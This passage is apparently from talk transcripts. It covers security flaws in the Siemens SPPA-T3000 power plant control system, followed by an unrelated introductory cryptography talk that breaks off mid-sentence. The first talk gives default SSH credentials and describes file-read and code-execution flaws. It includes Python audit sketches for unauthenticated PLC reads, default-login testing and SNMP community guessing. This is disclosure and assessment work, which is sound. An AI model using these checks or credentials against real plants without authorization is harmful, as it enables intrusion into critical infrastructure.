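The scheme described above can be sketched roughly as follows. The constants and exact hash construction here are illustrative stand-ins, not the extracted SPPA algorithm; the point is only the shape of an iterated, salted hash with an extra vendor-wide constant, and how a password audit is just this check run over a word list.

```python
import hashlib
from hmac import compare_digest

VENDOR_CONSTANT = b"example-hardcoded-salt"   # stand-in for the shared constant

def iterated_hash(password: str, user_salt: bytes, iterations: int) -> bytes:
    """Crypt-style scheme: hash password plus salts, then re-hash N times."""
    digest = hashlib.sha256(password.encode() + user_salt + VENDOR_CONSTANT).digest()
    for _ in range(iterations):
        digest = hashlib.sha256(digest).digest()
    return digest

def check_password(candidate: str, user_salt: bytes, iterations: int, stored: bytes) -> bool:
    return compare_digest(iterated_hash(candidate, user_salt, iterations), stored)

def audit(wordlist, user_salt: bytes, iterations: int, stored: bytes):
    """A password audit is simply the check above run in a loop over a word list."""
    for word in wordlist:
        if check_password(word, user_salt, iterations, stored):
            return word
    return None
```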
The tool to extract password hashes and the parameters from the pdata1 file has been developed; on the slide you can see its output. The tool can be used during password auditing to check for weak or dictionary passwords and to check the hash calculation parameters. The tool is available at the link below. That draws a line under the application server analysis. First, as we have seen, the attack surface is really huge and includes a lot of different components. Secondly, it's about remote connections: whether it's the vendor or someone else who told you that the SPPA has no remote connections, you should check it anyway. The last thing is that an attacker has an opportunity to impact the power generation process. For example, he can start or stop generation, change some output value or obtain additional information about the generation process, and all these actions can be done from the application server. That's all about the application server; let's start the discussion about automation. The main goal of the automation server is to execute real-time automation functions and tasks. Depending on the power plant project architecture and its features, the role of the automation server can differ. We have distinguished three roles. The first one is the automation role. There may be slight confusion because the term is used both for the server and for its role, but analyzing automation server configurations and publicly available information, we found that whatever the role is, almost the same hardware and software are used, and we decided to use this kind of classification. It seems less confusing to us; at the same time, it's different from the vendor classification. Anyway, having the automation role means that the server is responsible for interaction with input/output modules, which control and monitor power plant equipment such as the turbine, the electric generator and some others. The second role is communication. This role is used for connecting third-party software and systems. In other words, it's just a protocol converter supporting such protocols as Modbus, IEC 101, IEC 104 and some others. And the last role is the migration role. This role is used to connect previous versions of SPPA-T3000 and other legacy systems such as SPPA-T2000 or Teleperm ME. The automation role can run on a SIMATIC S7 PLC or on an industrial PC. Now let's talk a little more about each role. Let's start with the automation role based on a PLC. The PLC directly controls devices like valves in the turbine, and access to it is game over for any security discussion. They usually represent the lowest level in various reference models, such as the Purdue model for example. Any configuration changes and updates for a PLC require stopping the technological process, so these devices always have security misconfigurations, firmware without security updates and insecure industrial protocols. In the case of SPPA, these are the S7 protocols and the PLC data protocol. There is a lot of information about the S7 protocols on the Internet, but not so much about the PLC data protocol, so we had to deal with it and analyze it ourselves. It's not a special protocol just for SPPA: when you program your SIMATIC PLCs and need to exchange some data between them in real time, you use this protocol. It's quite a simple protocol, and maybe its description is available somewhere on the Internet, but we couldn't find it, so we just show you its structure here. Anyway, there are no security mechanisms in this protocol, so the only obstacle while doing a man-in-the-middle attack to spoof data is the sequence number, which we can get from a packet and simply track in the implementation.
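Staying on the S7 side for a moment: a minimal sketch of the kind of unauthorized-read check this implies is below, using the python-snap7 bindings for the open snap7 S7 communication library. The address, rack/slot and data block number are placeholders for your own test setup; whether the read succeeds depends on the mode selector and protection settings discussed next.

```python
import snap7  # pip install python-snap7 (bindings for the snap7 S7comm library)

PLC_IP = "192.168.1.10"   # placeholder address on the automation network
RACK, SLOT = 0, 2         # placeholder values; set them to match the CPU in question

def can_read_without_credentials(db_number: int = 1, size: int = 16) -> bool:
    """Return True if the PLC hands out data block contents to a client that
    presents no credentials at all, i.e. read protection is effectively off."""
    client = snap7.client.Client()
    try:
        client.connect(PLC_IP, RACK, SLOT)
        data = client.db_read(db_number, 0, size)
        print("read succeeded:", data.hex())
        return True
    except Exception as exc:
        print("read refused or failed:", exc)
        return False
    finally:
        if client.get_connected():
            client.disconnect()

if __name__ == "__main__":
    can_read_without_credentials()
```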
For protocol analysis we have developed a dissector, which is available at the link below. During security assessments of PLC configurations, one of the main things we check is unauthorized access to reading and writing PLC memory. Protection against unauthorized access is determined by the position of the mode selector of the PLC and some other configuration parameters. During previous research conducted by one of our colleagues, Daniel Parnichev, a privilege matrix was obtained. It shows insecure states and configurations of PLCs. The tool for gathering information from the PLC over the network and analyzing it has been developed by Daniel and is also available in our repository. Now let's talk about the automation server based on an industrial PC. It's just a Linux box. During start-up it tries to download some additional files from the application server. These files include JAR files, bash scripts, some configuration and protocol files, and some others. In order to execute the JAR files, the PTC Perc virtual machine is used. It's a real-time Java machine widely used in the industrial, IoT and military areas. PTC Perc contains an ahead-of-time compilation mechanism. As a result, the JAR files contain a bytecode transformation. That's why regular decompilers fail on them. To solve this problem we have written a PHP script to perform the reverse transformation; after that, regular decompilers were successful. The running JARs open RMI services on the automation server, plus some extensions of them. For example, in the case of the migration server, the Orion RPC services, which are an extension of the classic Java RMI services, are used. On the slide you can see the list of these services. The security issues of the automation server based on an industrial PC are presented on the slide. Firstly, as you can see, there is a possibility to spoof the files downloaded from the application server. The files are downloaded over HTTP and there are no security mechanisms during the process. Secondly, it's about default credentials: you can get access over SSH to the server with the user cmadmin and the password cm. Next, there are vulnerabilities in the Orion RPC services. These vulnerabilities allow sensitive data disclosure and remote code execution. And finally, the last group is vulnerabilities found in the software used to fulfil the migration role for communication with SPPA-T2000, also known as the TXP system. With the number of issues on the migration server and in old TXP, you are not in a good position, as you can imagine. A few words about the Orion RPC vulnerabilities. They are in the runtime engineering service. This service contains a request runtime container method where the first argument defines the action to be executed. Using the read file action it's possible to get the content of any file on the system. Using the write config file action it's possible to write any information to the server. For example, it can be a JAR file which executes a shell command from the command line, and using some SPPA-specific functions you can execute these JAR files later. That's all about the automation server. To sum up, the automation server can be based on a PLC or an industrial PC. In the case of a PLC, it's a usual PLC with known security issues. In the case of an industrial PC, it's just a Linux box which tries to download some additional files from the application server and executes some of them with the Perc virtual machine. So far we haven't mentioned any network equipment used in the distributed control system.
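One flavor of do-it-yourself check that falls out of the issues above is simply trying the documented default credentials, for example the SSH account on the automation server. A hedged sketch with paramiko is below; the host is a placeholder, the exact spelling of the default username and password should be confirmed against the vendor documentation or the white paper, and of course this is only for systems you are authorized to assess.

```python
import paramiko

def default_ssh_login_works(host: str, username: str = "cmadmin", password: str = "cm") -> bool:
    """Return True if the automation server still accepts the default SSH
    credentials described in the talk (exact spelling may differ per version)."""
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, username=username, password=password,
                       timeout=5, allow_agent=False, look_for_keys=False)
        return True
    except paramiko.AuthenticationException:
        return False
    finally:
        client.close()

if __name__ == "__main__":
    # Placeholder address of an automation server in your own test network.
    print(default_ssh_login_works("192.168.2.20"))
```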
In the research we saw a wide variety of network devices and network infrastructure, including switches, firewalls and more rare devices such as data diodes, for example. We tried to summarize all this information and got a common SPPA network topology. We have shown a couple of typical placements of network devices, but the same devices can be found in other vendors' distributed control systems. Network devices in industrial networks usually have a lot of security issues. The reason for this is that most of them don't require any configuration before start and can be run out of the box. That's why you see things like guessable SNMP community strings, default credentials for different services, firmware with publicly available exploits, and just a lack of security configuration. All these things are usual for network devices, and they are the usual security issues for industrial networks. I think that's all. Now, Gleb, to sum up our discussion. So the topic of power plants is huge. The system is huge, and we tried to cover this and all sorts of small things in the talk, and everything can be summed up on this slide. These are just vulnerabilities: as you can see, problems in Java, in web applications, in different simple mechanisms that you can exploit to impact the process itself, without even going down to the PLCs or the field level. What we don't cover in this talk is what kind of havoc or disaster could be caused by attacking such systems, because it's actually not that bad. I mean, if we are talking about things like blackouts of cities or things like this, this is not what you can do with an attack on such a system, because the distribution of power in the grid is, according to the threat model, not the problem of power generation. There should be another regulator who watches that there is enough capacity in the network to deliver electricity to the customers. So what we are really speaking about here is how we can impact, for example, the turbine itself. But we had no access to a real turbine. They're big and expensive, and we haven't found anyone willing to provide us one so that we could destroy it. But the point is we have an educated guess: the PLCs control a lot of parameters of this turbine, and the turbine is a big mechanical monster that is actually self-degrading just by working, and putting it into different uncomfortable operating modes will degrade it even faster, or it will break it. And it's not easy: you can have a spare PLC or some other device, but you won't have a spare turbine. So the impact is there, but it's not very huge. So what we tried to do with this research mostly is to understand how we can help the power plant operators out there. Having found all the issues and analyzed this infrastructure on the customer side, we understood that all of the installations are actually the same, and we can write a very simple do-it-yourself assessment so that hopefully even the engineers at the power plants can test themselves. It is a very easy set of steps on two or three pages: you connect to the application network, you connect to the automation network, you run the tests, you get the results, and afterwards you talk with Siemens or you fix something by yourselves. Basically you don't have to hire expensive consultants to do the job; you should be able to do it by yourself. I hope that you will be able to do it.
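One building block of such a do-it-yourself check could be a probe for guessable SNMP community strings on the network devices just mentioned. The sketch below shells out to the net-snmp command-line tools, which are assumed to be installed; hosts and the community wordlist are placeholders.

```python
# Rough sketch of probing for guessable SNMP community strings using the
# net-snmp "snmpget" command (assumed installed). Audit your own gear only.
import subprocess

SYS_DESCR = "1.3.6.1.2.1.1.1.0"   # standard sysDescr OID

def community_works(host, community):
    result = subprocess.run(
        ["snmpget", "-v2c", "-c", community, "-t", "2", "-r", "0",
         host, SYS_DESCR],
        capture_output=True, text=True)
    return result.returncode == 0

for host in ["192.0.2.20"]:                    # placeholder switch/firewall
    for community in ["public", "private"]:    # typical guessable strings
        if community_works(host, community):
            print(f"{host}: community '{community}' is accepted")
```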
Of course, to summarize the whole situation around DCSs: if you have seen other industrial solutions like SCADA stations, anything really, you would find a lot of similarities, and it has the same pain points as all other solutions. There is a good document, IEC 62443, which describes how a power plant operator or asset owner should talk to the system integrator and the vendor in terms of what security they should require and how they should control it. We urge any power plant operator to read this standard and to require security from their vendors and system integrators, because nowadays it varies from vendor to vendor whether the vendor is more interested in the security of the plant or some regulator is, and nobody knows how to act. This is the document which describes how you should talk with all the other entities. Of course, read the slides, or read the white paper in January, call Siemens, update all systems, change your passwords and configurations. That makes it actually very easy to at least shrink the attack surface. A lot of things inside the SPPA-T3000 network are modern Windows boxes, and it's kind of easy to set up some form of monitoring. You should talk to your security operations center; they will be able to look for some logs. Most of the impact that we showed was impact from the Java applications, and you won't be able to monitor that with Windows security events, but at least it's still some form of detection process inside your network. Again, finally, to summarize: it is not a problem of just one DCS from Siemens. There are exactly the same issues for other vendors not mentioned here. We will release a lot of things today, tomorrow and in January: basically the big white paper about everything that we found out, with recommendations on what to do, with the word lists, with the do-it-yourself security assessment, and with a lot of tools. One of the tools will help you to do the research, and other tools will help you if, for example, you're using intrusion detection systems, IDSes: you will be able to parse the protocols and maybe write some signatures for them. We worked closely with Siemens, and we want to say thank you to Siemens ProductCERT. They did a great job in the communication between us and the product team that develops SPPA-T3000 itself. The main outline of the vendor response is that if you are a power plant operator, you should hurry and install the new version 8.2 SP2. Siemens is trying to educate and raise awareness among their customers that, first of all, they should change passwords, that there are critical vulnerabilities, and that they should do something about it. Not all of the problems are fixable by Siemens themselves; the operator is responsible for doing some of the security activities by themselves. That's actually it. Thank you. Thank you very much. Thank you, Congress. If you have any questions, please welcome. Thank all of you for this excellent talk. We have a short three minutes for questions. If you have questions, please line up at the microphones in the hall. If you are using hearing aids, there is an induction loop at microphone number three. Do we have questions from the internet? Yes. A question from our signal angel, please. We have a question: with the vulnerabilities found, could you take over those plants from the World Wide Web, without further man-in-the-middle attacks? Can you please repeat? A little bit louder, please. Sorry.
With the vulnerabilities found, could you take control over those plants from the public internet, without further man-in-the-middle attacks? Actually no, and this is some form of good news. As those systems are exclusively supported by one system integrator, by Siemens, they are more or less protected from external access. Of course, there could be external access, but it's not that easy to reach it. Of course, we're not talking about the internet; we're talking about some corporate networks or things like this. Next question, microphone three, please. Yes, hello. I also have a power plant on my planet and it's kind of bad for the atmosphere, I figured. My question is, can you skip back to where the red button is to switch it off? I'm asking for a friend. Well, I have thought about that; these materials can be used in this way. Specifically, if you have operator or engineer friends at the power plant, you can talk to them. Do we have any more questions from the internet? No questions. Any questions from the hall? I guess not. Well then, thank you very much for this talk and a warm round of applause. Thank you.
A deep dive into the power generation process, industrial solutions and their security implications, flavoured with vulnerabilities, penetration testing (security assessment) methodology and available remediation approaches. The research studies a very widespread type of industrial site throughout the world – power generation plants. Specifically, the heart of power generation – turbines and their DCS, the control system managing all operations for powering our TVs and railways, gaming consoles and manufacturing, kettles and surveillance systems. We will share our notes on how those systems function, where they are located network-wise and what security challenges owners of power generation are facing. A series of vulnerabilities will be disclosed along with a prioritisation of DCS elements (hosts) and attack vectors. The discussed vulnerabilities are addressed by the vendor of one of the most widespread DCSs on our planet. During the talk we will focus on a methodology for safely assessing your DCS installation, which security issues you should try to address in the first place and how to perform do-it-yourself remediation. Most of the remediation steps are confirmed by the vendor, which is crucial for industrial owners.
10.5446/53194 (DOI)
Now for the next talk: he has worked for six years in the field of cryptography at the Uni Karlsruhe — OZ. Okay, so thanks for the introduction and welcome to my talk. As our Herald just said, I've been working in the area of cryptography for the better part of the last six years, and I noticed that many people today have kind of a mental image of what cryptography is and what encryption is, but sometimes this mental image does not really coincide with what is actually going on. So I wanted to give an introductory talk to cryptography that is accessible to a broad audience, so to an audience that does not have any prior exposure to cryptography and maybe even to an audience that does not have a background in maths or computer science. So as I said before, this talk is specifically aimed at a non-technical audience, even though at 36C3 we probably have a fairly technical audience, and this is a foundations talk. So I will not be speaking about fancy research or cutting-edge results; I will be talking about the plain basics. Okay, so apart from working in cryptography, I enjoy doing applied cryptography, number theory and pwning, so exploiting all kinds of memory corruption bugs in programs. Okay, this is a picture of my parents' cats, just because every talk should have pictures of cats in it. And this is... Thanks. So this is my checklist for this talk. The first item, I think we already did that, and so for the remainder of the talk, I want to explain what encryption is, what it does and what it does not do. I want to explain authentication, which fixes a problem that encryption does not solve. I want to explain certificates because they help a lot with both encryption and authentication. And in the end, I want to explain a little how the things that I'm going to introduce work together and can be combined to build more useful things. Okay, so let's start with the first point here. I would like to explain encryption. So encryption is basically a solution to a problem, so let's talk about the problem before we get to the solution. The problem here is... or one of the classical problems is that two parties want to communicate, so we cryptographers commonly call them Alice and Bob, and Alice wants to send a message to Bob. So in this case, it's just a very stupid message, just a simple hello, but cryptography has been used in diplomacy and the military for hundreds of years, so imagine that this message is something more critical. And the problem we want to solve is that there might be an eavesdropper who wants to listen in on the connection and read the message, read the content that is being sent from Alice to Bob. And what some people think, how cryptography works, is something like the following, which is kind of close to the real thing, but not really: Alice applies some kind of encryption procedure to her plaintext message to produce some random, unintelligible gibberish, which we call the ciphertext. And then Alice sends the ciphertext to Bob, and Bob has the decryption procedure, knows how to decrypt, so to invert the encryption procedure and recover the plaintext message. And now, the point that some people get wrong is that some people think that the knowledge of how to decrypt is actually secret. But that is not true today. So in 1883, a person named Auguste Kerckhoffs formulated a couple of principles that ciphers used for military applications should adhere to.
And one of these requirements became well known as Kerckhoffs' principle, and it reads: a cipher should not require secrecy, and it should not be a problem if the cipher falls into enemy hands. So rephrasing this a little, the cipher that you are using should be secure enough that you can even tell your enemy or the attacker how the encryption process is working and how the decryption process is working without harming the security of the encryption. Or to rephrase this yet another time: if the cipher you are using is so insecure that you cannot tell anyone how it works, then maybe you shouldn't be using it in the first place. So let's get back to this image. So now if the attacker knows how to decrypt the message, then obviously this very simple scheme does not yield anything useful. And so what people did is introduce a key to this image. So now the encryption procedure and the decryption procedure use a key, which goes into the computation that is going on. So Alice does some kind of computation based on the message and the key to produce the ciphertext, and Bob, who has the same key, can invert this encryption operation and recover the plaintext. However, as long as the key is only known to Alice and Bob, but not to the attacker, the attacker cannot use the decryption procedure. So one general word here: I will not go into the details of how these boxes operate. Within these boxes, which represent computations, there is some math or computer science going on, and I would like to not explain how these things operate internally in order to keep this talk accessible to a broad audience. Okay, so a problem that we have here is that Alice and Bob have to agree on the key in advance. So Alice cannot simply send over the key to Bob, because if she did, then the attacker, who is eavesdropping on the connection, learns the key as well as the message, and then the attacker could just decrypt the same as Bob. Okay, so this does not work. This is a terrible attempt. So for quite some years, actually until the 70s and 80s of the last century, people were only using this scheme, and this is what we call symmetric encryption, because we could just flip the image around and Bob could be sending a message to Alice instead, because encryption and decryption use the same key. And since there is symmetric encryption, you can guess there is something else, which is called asymmetric encryption, and there is: for asymmetric encryption, there is a pair of keys. One of them is used for encryption and one of them is used for decryption. And now if we have an asymmetric encryption scheme, we can do something like the following. So Bob generates a pair of these keys, one for encryption and one for decryption, and he keeps the decryption key to himself. This is why the decryption key is called the secret key. However, Bob can publish the encryption key for everyone to see. So for example, it could be put in a kind of public registry like a phone book or whatever. And now Bob can send his public key to Alice, and an eavesdropper who is listening in on the connection will learn the public key, but that's not a problem because the key is public anyway. And now, after we have done this, Alice can use Bob's encryption key to encrypt her message and send that over to Bob, and now Bob can decrypt the message with his secret decryption key.
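To make the symmetric case described above concrete, here is a minimal sketch in which one shared key object both encrypts and decrypts; in the asymmetric setting just described, Bob's public key would encrypt and only his private key would decrypt. The Fernet recipe from the third-party cryptography package is used purely as an illustration, not as what the speaker's slides show.

```python
# Symmetric encryption in a few lines: the same shared key encrypts (Alice)
# and decrypts (Bob). Fernet is just one ready-made symmetric scheme.
from cryptography.fernet import Fernet

key = Fernet.generate_key()          # must reach Bob over some secure channel
cipher = Fernet(key)

ciphertext = cipher.encrypt(b"hello")    # Alice's side
print(ciphertext)                        # random-looking gibberish
print(cipher.decrypt(ciphertext))        # Bob's side: b'hello'
```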
However, the eavesdropper here cannot simply decrypt the message because even though the eavesdropper has the encryption key, it does not have the decryption key and the eavesdropper cannot decrypt. Okay. However this solution is still kind of risky. There is still a problem with this and it is we still have to make sure the keys are distributed in advance. So if we used the simple scheme where Bob is sending his public key to Alice, then there is a problem if the attacker is not simply passively eavesdropping on the connection but is willing to actively interfere with the connection. So for example, the eavesdropper might intercept the public key that Bob is sending to Alice and replace it with his or her own public key. And then Alice would think that the key she received belongs to Bob and use this key to encrypt her message to Bob and then suddenly the attacker can read the message again. So at this point, let's summarize about encryption. So encryption conceals the content of data. And this is pretty much what it does and pretty much the only thing that it does. In particular, it does not conceal the fact that there is communication going on. So an eavesdropper who is listening in on the connection obviously can see Alice sending a message to Bob and thus the eavesdropper knows there is communication going on between Alice and Bob. And this alone could be quite dangerous for Alice and Bob. So imagine if Alice was working for an intelligence agency and Bob was a journalist and the attacker sees Alice sending lots of documents to Bob, then this might be a strong indication that Alice is a whistleblower and Alice could be put into jail. So something more that is not concealed by encryption is the amount of data that is being exchanged. So if Alice is sending just a very short message to Bob, then the eavesdropper can guess that the message that is being transferred is not a 20 gigabytes file or something. So all this kind of metadata is something that encryption does not conceal. And there is a couple of more problems with encryption. One of them is that the attacker might change the message. Protecting from changes to the message is not the job of encryption. Another problem is that keys must be exchanged in advance, which I already talked about. And there are more problems. So for example, an attacker might simply record a message when it is sent and later just replay this message to Bob. Or an attacker might go ahead and block a message altogether, so intercept the message and throw it into the trash to make sure it never arrives at Bob's site. And the first problem here, an attacker might change the message, will actually lead me to the second part of my talk, which is authentication. So on my talk checklist, let's mark encryption as done. Okay. So now, what is authentication? Authentication enables the detection of changes to data. It does not prevent changes from happening. It only enables the recipient to detect the changes after they have happened. Okay. So for example, one example where something like authentication was needed is when Bob was sending his public key to Alice, but this is by far not the only scenario where authentication is needed. So imagine if Alice is running a charitable organization, so for example, she is saving refugees from drowning in the Mediterranean Sea, and Bob wants to donate to Alice to help her do that, then Alice has to send her bank account number to Bob so that Bob can make the donation. 
And notice that in this scenario, the message that Alice is sending to Bob, her bank account number, is nothing that is secret. It does not have to be encrypted because this information is public knowledge. However, we do want to make sure that the message that arrives at Bob is indeed the correct bank account number. So to prevent something like this from happening, where a criminal might intercept the message and replace the bank account number, so Bob would send his money to the criminal's bank account instead of Alice's. And one way to realize authentication is again by having a pair of keys. One of them is used for authentication, and one of them is used for verification, so checking if a message has been changed or not. And the authentication key must be kept secret, thus it is called the secret key, whereas the verification key can be made public, and it is called the public key. And now if you have a setup like this, then Alice can go ahead and take the message that she wants to send to Bob and apply some computation to it together with the secret key, the authentication key to produce something that we call a signature or a digital signature. And then Alice sends this signature over to Bob along with her bank account number, and Bob will take the signature that he receives and the bank account number he receives and apply some kind of computation to them, and this computation will determine if the bank account number has been changed or is in fact original. So if the attacker changes the bank account number, then Bob will be able to detect this change by checking the signature. And this holds even if the attacker does not only change the bank account number but also the signature. So these things are designed in a way which hopefully makes it impossible for any attacker to come up with a valid signature for anything else than the original message. Okay. So the only thing that Bob will, the only way that Bob will accept the signature is if the attacker does not in fact change the bank account number. And in this case, it is safe for Bob to transfer the money. Okay. But here, okay, so here is a different solution to this problem. And it's actually pretty much the same except that now we have just a single key which is used for both authentication and verification. And in this case, things simply have a different name. They work in exactly the same way except that the signature is called a message authentication code or MAC for short. Okay. But in both of these scenarios, whether we have two distinct keys or just one key, we still have the problem of key distribution. Okay. So imagine if in the scenario with two keys, Alice was sending her public key to Bob, then we would have the same attack as before. Namely the attacker could just go ahead and change the key that Alice is sending to Bob and exchange it for his own key. And so if the attacker is sending his own public key, his own verification key to Bob, then obviously the attacker can create a valid signature for his forged bank account number and Bob would accept this. Okay. So again, we have this problem of key distribution which is that the verification key must be known to Bob in advance. Okay. And this leads me to my next, the next section of my talk. So let's mark authentication as done and go on with certificates. So a certificate is a document that confirms that a specific public key belongs to a specific entity. It can be a simple person or an organization. 
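Going back to the authentication mechanism just described, the single-key variant, a message authentication code, takes only a few lines with Python's standard library; the key and message here are made up for illustration.

```python
# A MAC with the standard library: Alice and Bob share one secret key; any
# change to the message (or to the MAC itself) makes verification fail.
import hashlib
import hmac

key = b"shared-secret-key"
message = b"IBAN: DE00 1234 5678 9012 3456 78"

tag = hmac.new(key, message, hashlib.sha256).digest()        # Alice's side

def verify(key, message, tag):                               # Bob's side
    expected = hmac.new(key, message, hashlib.sha256).digest()
    return hmac.compare_digest(expected, tag)   # constant-time comparison

print(verify(key, message, tag))                 # True: unchanged
print(verify(key, b"IBAN: DE99 ...", tag))       # False: bank account swapped
```

The asymmetric variant, a digital signature, works the same way from the caller's point of view, except that signing uses the secret key and verification uses the public one.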
And if we want to use certificates, let's just go back to the scenario we had before. So Alice wants to send her bank account number, her public key, and a signature for her bank account number to Bob. And an attacker might change the public key and the bank account number and the signature. And now if we add certificates into this, we need to add something that we call a certificate authority. This is a trusted third party which will create certificates which confirm the association between a person and a public key. So before Alice is sending a message to Bob, she will walk up to the certificate authority and say, hey, certificate authority, this is my public key. I'm Alice. Please give me a certificate. And then the certification authority will check that Alice is indeed Alice and that Alice indeed owns this public key. And if Alice passes these checks, then the certification authority will create a certificate and hand that to Alice. And this certificate is just a document which says that the certification authority has verified that the silvery key here on the slides belongs to Alice. And now once Alice has the certificate, she can just send her public key to Bob together with the certificate. And then Bob, if he knows the certificate authority's public key, can check that the certificate is indeed correct. So it was indeed created by the certificate authority. And if he trusts the certificate authority, he will know that the silvery key is in fact Alice's. And then afterwards, Bob will be convinced that the silvery key is Alice's and he can check the message that Alice is sending to Bob and make sure it has not been changed. Okay. So we're not completely free from the key distribution problem yet, however, because still Bob has to know the public key of the certification authority in advance. So Bob does not need to know Alice's public key in advance, but he needs to know the public key of the certification authority in advance. And in practice, there's not just a single certification authority, but there's a whole bunch of them, and certification authorities can even create certificates for other certification authorities and so on. So now Bob does not have to know all the public keys of everyone he's communicating with, but he only has to know the public keys of a couple of certification authorities. Okay. So let's summarize about certificates. So as I said before, certificates confirm that a specific public key belongs to a specific entity, like a person or an organization, but we're still not completely free from the key distribution problem because people have to know the certificate authority's public keys. And another problem here is that this scheme gives an enormous amount of power to a certification authority. So if an attacker can compromise a certification authority, then he could force the certification authority to create fake certificates connecting fake keys to real identities. So he could create a fake certificate which says that the certification authority has checked that the attacker's public key belongs to Alice. And fixing this problem about the certification authority's power is something that cryptographers are still working on. So that's still a problem today. And in fact, this problem is not just theoretical. There's a number of incidents that have happened with certification authorities. 
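The idea of a certificate as a CA-signed binding between a name and a public key can be sketched in a few lines. This is only a toy: real certificates (X.509) carry far more structure, and the sketch uses Ed25519 signatures from the third-party cryptography package. Note how completely the scheme depends on trusting the CA's key, which is why the real-world incidents mentioned above matter.

```python
# A toy "certificate": the CA signs the statement that a given public key
# belongs to Alice. Bob only needs to know the CA's public key in advance.
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

ca_key = Ed25519PrivateKey.generate()          # the certificate authority
alice_key = Ed25519PrivateKey.generate()       # Alice's key pair

alice_pub_bytes = alice_key.public_key().public_bytes(
    serialization.Encoding.Raw, serialization.PublicFormat.Raw)
statement = b"subject=Alice;key=" + alice_pub_bytes
certificate = ca_key.sign(statement)           # the "certificate"

try:
    ca_key.public_key().verify(certificate, statement)   # Bob's check
    print("certificate is valid: this key belongs to Alice")
except InvalidSignature:
    print("certificate is forged")
```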
So one famous example is the DigiNOTAR case where, in fact, a certification authority named DigiNOTAR was hacked and the attacker has created a fake certificate for a Google.com domain or one of the other Google domains I don't exactly remember. And then these certificates showed up being used in Iran. Okay. So this is not just a theoretical problem. This has, in fact, happened before. Okay. So this concludes what I wanted to say about certificates. So let's move on and see how these things can be put together to build more complex but also more useful tools. So one of the tools I want to introduce is called authenticated encryption. And it's basically a combination of encryption and authentication. So for some reason, people use this phrase mostly in the symmetric case, so where there is one key for encryption and decryption and one key for authentication and for verification. But you could pretty much recreate the same scheme in an asymmetric fashion and that is also being done in practice. In this case, people just don't call it authenticated encryption. So one way to build authenticated encryption is, so if Alice wants to send a message to Bob, then she will encrypt the message using the encryption key and send the ciphertext over to Bob. And then she will use a copy of the ciphertext and compute a message authentication code from it using the second key that she has. And then Bob is, Alice is going to send over that message authentication code to Bob, too. And now Bob can decrypt the message using the key he has and additionally, Bob can check if this message has been changed or whether it is original by using the verification procedure. Okay. So, again, this kind of authentication does not prevent changes from happening, but Bob can check whether a change has happened. And in fact, this kind of authenticated encryption can actually boost the security of the encryption scheme. Okay. So another thing I wanted to talk about is called hybrid encryption. And this is a combination of symmetric encryption and asymmetric encryption. And the reason why this is interesting is that asymmetric encryption is usually quite slow compared to symmetric encryption. So if you wanted to send a very long message to Bob and you only had a public key encryption scheme, so an asymmetric encryption scheme, then it would take a very long time to encrypt the message and to decrypt the message. So however you can combine asymmetric encryption and symmetric encryption in a way that makes the encryption process faster, and the way you do this is so if Alice wants to send a message to Bob, Alice first generates a new key for the symmetric encryption scheme, and Alice will encrypt her message with this key and send the ciphertext over to Bob, and afterwards Alice will take the symmetric key that she has just generated and encrypt this key with Bob's public key. And then that is sent over to Bob as well. And now Bob can decrypt the symmetric key using his secret decryption key, the kind of golden one here on the slides, to recover the symmetric key, and afterwards Bob can use the freshly recovered symmetric key to decrypt the actual message. However a neistropper listening in on the connection cannot decrypt the message because it does not have the symmetric key, and it cannot decrypt the symmetric key because it does not have Bob's secret decryption key. Okay, so you can continue to build on these kind of things, and what you end up with is something called transport layer security, or TLS for short. 
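Before moving on to TLS, here is a minimal sketch of the hybrid encryption just described: the long message is encrypted with a freshly generated symmetric key, and only that small key is encrypted with Bob's slow public-key scheme. The padding and key sizes below are just one common choice, using the third-party cryptography package.

```python
# Hybrid encryption sketch: symmetric encryption for the bulk data,
# public-key encryption only for the short session key.
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

bob_private = rsa.generate_private_key(public_exponent=65537, key_size=2048)
bob_public = bob_private.public_key()
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# Alice's side
session_key = Fernet.generate_key()
ciphertext = Fernet(session_key).encrypt(b"a rather long message ... " * 100)
wrapped_key = bob_public.encrypt(session_key, oaep)

# Bob's side
recovered_key = bob_private.decrypt(wrapped_key, oaep)
print(Fernet(recovered_key).decrypt(ciphertext)[:26])
```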
And transport layer security is a network protocol that combines much of the things that I have introduced so far, so it combines encryption, either symmetric or hybrid, and it combines it with authentication, so max and signatures and certificates and all the other things, and it adds in a couple of more things to detect replays of messages. So if an attacker was to simply replay a message recorded earlier, this is something that TLS can detect, and TLS can also detect if a message has been suppressed by the attacker, so within a connection. So what TLS does is it kind of establishes a secure connection between two entities, so say Alice and Bob, over an insecure network, which is controlled by the attacker. And one application where TLS is commonly used is for sending emails, so for example, when you're sending an email from, say, Alice wants to send an email to Bob, then the email is usually not sent directly, but Alice sends the message to her own email server, and then Alice's email server will forward this email to Bob's email server, and when Bob goes online and checks his emails, the email will be downloaded to his device, like his phone or desktop computer or whatever device Bob is using. And while Alice can make sure that when she is uploading her email to her own server, that this connection is secure just by encrypting the message, so essentially using TLS and all the things that involves, like encrypting the message and authenticating the message and so on. However Alice cannot check if her own email server also uses a secure connection to forward this email to Bob's server. So let us take a more detailed look here. So each of these green locks signifies a secure connection. This means that when a message is sent, then, or each time a message is sent over a secure connection, there is some encryption and authentication going on on the sender side and some decryption and verification going on on the receiving side. So if Alice wants to send an email to Bob, then Alice will build up a secure connection and send the email over it, and this will involve encrypting the email and authenticating the email, and Alice's server will decrypt the email and verify that it has not been changed, and then Alice's server will forward the email to Bob's server, which involves again encrypting it and authenticating it, and Bob's server will decrypt and verify it. And then again the same process repeats when the email is sent or is downloaded by Bob from his server. However, in this case, so even though the message is encrypted every time it is sent over network, it is known in plain text by Alice's server and Bob's server, right? Because Alice is sending the message, so she's encrypting it, and Alice's server is decrypting it, so Alice's server can read the message in plain text. And the same goes for Bob's server. And this is what we call transport encryption, because the email is encrypted every time it is being sent over network. And a concept opposed to this is what we call end-to-end encryption, where Alice, before sending the message, Alice encrypts it, but not with a key that is known to her server, but directly with Bob's public key, and she might even sign it with her own secret authentication key. And then Alice sends this already encrypted message over a secure channel to her own server, which involves encrypting the message again and authenticating it again. And then Alice's server will decrypt the message and verify that it has not been changed. 
